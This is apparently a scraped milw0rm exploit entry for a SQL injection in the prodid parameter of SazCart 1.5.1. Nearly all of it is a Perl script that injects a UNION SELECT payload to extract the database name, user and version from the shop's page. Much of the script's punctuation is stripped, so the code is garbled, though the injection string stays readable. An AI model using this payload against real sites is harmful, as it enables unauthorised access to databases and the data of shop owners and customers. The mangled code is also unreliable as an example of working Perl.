SazCart 1.5.1 - prodid SQL Injection
SazCart 1.5.1 - prodid SQL Injection !/usr/bin/perl SazCart new or die; my $go=$cnx-get$victim."?details&prodid=1'+union+all+select+0,1,convertconcatdatabase,char58,user,char58,version,char,3,4/"; if $go-content = m/Price:.?\br/ms print "+ $1\n\n"; else print "\n- exploit failed\n"; milw0rm.com...